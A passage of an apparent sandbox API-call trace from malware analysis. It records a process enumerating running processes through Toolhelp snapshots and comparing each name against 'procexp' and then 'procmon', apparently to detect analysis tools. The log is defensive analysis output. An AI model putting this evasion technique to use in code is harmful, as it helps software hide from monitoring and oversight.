lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0083.038] StrStrIW (lpFirst="wininit.exe", lpSrch="procexp") returned 0x0 [0083.038] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.038] StrStrIW (lpFirst="csrss.exe", lpSrch="procexp") returned 0x0 [0083.038] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0083.039] StrStrIW (lpFirst="winlogon.exe", lpSrch="procexp") returned 0x0 [0083.039] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0083.039] StrStrIW (lpFirst="services.exe", lpSrch="procexp") returned 0x0 [0083.039] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0083.040] StrStrIW (lpFirst="lsass.exe", lpSrch="procexp") returned 0x0 [0083.040] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0083.040] StrStrIW (lpFirst="lsm.exe", lpSrch="procexp") returned 0x0 [0083.040] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.041] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.041] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.041] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.041] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.042] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.042] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.042] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.042] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.042] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.042] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0083.043] StrStrIW (lpFirst="audiodg.exe", lpSrch="procexp") returned 0x0 [0083.043] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.043] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.043] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.044] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.044] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0083.044] StrStrIW (lpFirst="spoolsv.exe", lpSrch="procexp") returned 0x0 [0083.044] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.045] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.045] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0083.045] StrStrIW (lpFirst="OfficeClickToRun.exe", lpSrch="procexp") returned 0x0 [0083.045] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.046] StrStrIW (lpFirst="taskhost.exe", lpSrch="procexp") returned 0x0 [0083.046] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x314, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0083.046] StrStrIW (lpFirst="dwm.exe", lpSrch="procexp") returned 0x0 [0083.046] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0083.046] StrStrIW (lpFirst="explorer.exe", lpSrch="procexp") returned 0x0 [0083.046] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.047] StrStrIW (lpFirst="taskeng.exe", lpSrch="procexp") returned 0x0 [0083.047] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x35c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0083.047] StrStrIW (lpFirst="taskeng.exe", lpSrch="procexp") returned 0x0 [0083.047] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0083.048] StrStrIW (lpFirst="ONENOTEM.EXE", lpSrch="procexp") returned 0x0 [0083.048] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0083.048] StrStrIW (lpFirst="WmiPrvSE.exe", lpSrch="procexp") returned 0x0 [0083.048] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0083.049] StrStrIW (lpFirst="taskhost.exe", lpSrch="procexp") returned 0x0 [0083.049] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="undertake.exe")) returned 1 [0083.049] StrStrIW (lpFirst="undertake.exe", lpSrch="procexp") returned 0x0 [0083.049] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="luxury-westminster-editing-cube.exe")) returned 1 [0083.049] StrStrIW (lpFirst="luxury-westminster-editing-cube.exe", lpSrch="procexp") returned 0x0 [0083.049] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="devon stickers.exe")) returned 1 [0083.050] StrStrIW (lpFirst="devon stickers.exe", lpSrch="procexp") returned 0x0 [0083.050] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="eagles_podcast_type_marker.exe")) returned 1 [0083.050] StrStrIW (lpFirst="eagles_podcast_type_marker.exe", lpSrch="procexp") returned 0x0 [0083.050] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="groups.exe")) returned 1 [0083.051] StrStrIW (lpFirst="groups.exe", lpSrch="procexp") returned 0x0 [0083.051] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="filesdetectedlosebenjamin.exe")) returned 1 [0083.051] StrStrIW (lpFirst="filesdetectedlosebenjamin.exe", lpSrch="procexp") returned 0x0 [0083.051] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="cincinnati consumers se.exe")) returned 1 [0083.051] StrStrIW (lpFirst="cincinnati consumers se.exe", lpSrch="procexp") returned 0x0 [0083.051] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="simply_wa_thumbnail_programmers.exe")) returned 1 [0083.052] StrStrIW (lpFirst="simply_wa_thumbnail_programmers.exe", lpSrch="procexp") returned 0x0 [0083.052] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x848, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="medicaid.exe")) returned 1 [0083.052] StrStrIW (lpFirst="medicaid.exe", lpSrch="procexp") returned 0x0 [0083.052] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="gateway.exe")) returned 1 [0083.053] StrStrIW (lpFirst="gateway.exe", lpSrch="procexp") returned 0x0 [0083.053] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="laden.exe")) returned 1 [0083.053] StrStrIW (lpFirst="laden.exe", lpSrch="procexp") returned 0x0 [0083.053] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="lying-yourself.exe")) returned 1 [0083.053] StrStrIW (lpFirst="lying-yourself.exe", lpSrch="procexp") returned 0x0 [0083.053] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="disclaimer_saudi_agreed_oem.exe")) returned 1 [0083.054] StrStrIW (lpFirst="disclaimer_saudi_agreed_oem.exe", lpSrch="procexp") returned 0x0 [0083.054] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="colleague wrap.exe")) returned 1 [0083.054] StrStrIW (lpFirst="colleague wrap.exe", lpSrch="procexp") returned 0x0 [0083.054] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="hottest-jm-depression-fought.exe")) returned 1 [0083.055] StrStrIW (lpFirst="hottest-jm-depression-fought.exe", lpSrch="procexp") returned 0x0 [0083.055] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="saturday.exe")) returned 1 [0083.055] StrStrIW (lpFirst="saturday.exe", lpSrch="procexp") returned 0x0 [0083.055] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="WINWORD.EXE")) returned 1 [0083.055] StrStrIW (lpFirst="WINWORD.EXE", lpSrch="procexp") returned 0x0 [0083.055] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.056] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.056] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0083.056] StrStrIW (lpFirst="OSPPSVC.EXE", lpSrch="procexp") returned 0x0 [0083.056] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0083.057] StrStrIW (lpFirst="sppsvc.exe", lpSrch="procexp") returned 0x0 [0083.057] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.057] StrStrIW (lpFirst="svchost.exe", lpSrch="procexp") returned 0x0 [0083.057] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 1 [0083.057] StrStrIW (lpFirst="iuoldw.exe", lpSrch="procexp") returned 0x0 [0083.057] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xa50, pcPriClassBase=8, dwFlags=0x0, szExeFile="iuoldw.exe")) returned 0 [0083.058] CloseHandle (hObject=0x148) returned 1 [0083.058] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x148 [0083.059] Process32FirstW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.060] StrStrIW (lpFirst="[System Process]", lpSrch="procmon") returned 0x0 [0083.060] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0083.060] StrStrIW (lpFirst="System", lpSrch="procmon") returned 0x0 [0083.060] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0083.061] StrStrIW (lpFirst="smss.exe", lpSrch="procmon") returned 0x0 [0083.061] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.061] StrStrIW (lpFirst="csrss.exe", lpSrch="procmon") returned 0x0 [0083.061] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0083.063] StrStrIW (lpFirst="wininit.exe", lpSrch="procmon") returned 0x0 [0083.063] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0083.063] StrStrIW (lpFirst="csrss.exe", lpSrch="procmon") returned 0x0 [0083.063] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0083.063] StrStrIW (lpFirst="winlogon.exe", lpSrch="procmon") returned 0x0 [0083.063] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0083.064] StrStrIW (lpFirst="services.exe", lpSrch="procmon") returned 0x0 [0083.064] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0083.064] StrStrIW (lpFirst="lsass.exe", lpSrch="procmon") returned 0x0 [0083.064] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0083.065] StrStrIW (lpFirst="lsm.exe", lpSrch="procmon") returned 0x0 [0083.065] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.065] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.065] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.065] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.065] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.066] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.066] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.066] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.066] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x35c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.067] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.067] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0083.067] StrStrIW (lpFirst="audiodg.exe", lpSrch="procmon") returned 0x0 [0083.067] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.067] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.067] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0083.068] StrStrIW (lpFirst="svchost.exe", lpSrch="procmon") returned 0x0 [0083.068] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x160, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0083.068] StrStrIW (lpFirst="spoolsv.exe", lpSrch="procmon") returned 0x0 [0083.068] Process32NextW (in: hSnapshot=0x148, lppe=0x18f61c | out: lppe=0x18f61c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, 